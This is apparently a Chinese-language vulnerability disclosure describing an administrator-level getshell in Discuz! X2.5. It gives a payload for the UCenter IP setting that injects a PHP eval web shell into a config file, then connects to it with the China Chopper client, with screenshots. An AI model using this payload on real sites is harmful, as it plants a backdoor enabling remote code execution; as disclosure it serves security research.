VULHUB ™

### 简要描述： Discuz!X2.5最新版后台管理员权限Getshell。 ### 详细说明： 1.在后台-->站长-->Ucenter设置处设置UcenterIP为 ``` XX\\');eval($_POST[a])?>;// XX ``` [<img src="https://images.seebug.org/upload/201209/10171816c48ab231e80b8bb428291a98a564a0de.jpg" alt="" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201209/10171816c48ab231e80b8bb428291a98a564a0de.jpg) 2.发现管理页面代码出来了 [<img src="https://images.seebug.org/upload/201209/10172101878b0c95737ac756eaf72ca9adb58671.jpg" alt="" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201209/10172101878b0c95737ac756eaf72ca9adb58671.jpg) 3.上菜刀！ [<img src="https://images.seebug.org/upload/201209/10172124e7aed732d81bdd0afa9f29a0622e76a0.jpg" alt="" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201209/10172124e7aed732d81bdd0afa9f29a0622e76a0.jpg) 4.看一下源码，哦，原来是这样的！ [<img src="https://images.seebug.org/upload/201209/10172158c1138ac884a3be1de3dd7f60fceaed33.jpg" alt=""...

### 简要描述： Discuz!X2.5最新版后台管理员权限Getshell。 ### 详细说明： 1.在后台-->站长-->Ucenter设置处设置UcenterIP为 ``` XX\\');eval($_POST[a])?>;// XX ``` [<img src="https://images.seebug.org/upload/201209/10171816c48ab231e80b8bb428291a98a564a0de.jpg" alt="" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201209/10171816c48ab231e80b8bb428291a98a564a0de.jpg) 2.发现管理页面代码出来了 [<img src="https://images.seebug.org/upload/201209/10172101878b0c95737ac756eaf72ca9adb58671.jpg" alt="" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201209/10172101878b0c95737ac756eaf72ca9adb58671.jpg) 3.上菜刀！ [<img src="https://images.seebug.org/upload/201209/10172124e7aed732d81bdd0afa9f29a0622e76a0.jpg" alt="" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201209/10172124e7aed732d81bdd0afa9f29a0622e76a0.jpg) 4.看一下源码，哦，原来是这样的！ [<img src="https://images.seebug.org/upload/201209/10172158c1138ac884a3be1de3dd7f60fceaed33.jpg" alt="" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201209/10172158c1138ac884a3be1de3dd7f60fceaed33.jpg) ### 漏洞证明： [<img src="https://images.seebug.org/upload/201209/10172124e7aed732d81bdd0afa9f29a0622e76a0.jpg" alt="" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201209/10172124e7aed732d81bdd0afa9f29a0622e76a0.jpg) [<img src="https://images.seebug.org/upload/201209/10172158c1138ac884a3be1de3dd7f60fceaed33.jpg" alt="" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201209/10172158c1138ac884a3be1de3dd7f60fceaed33.jpg)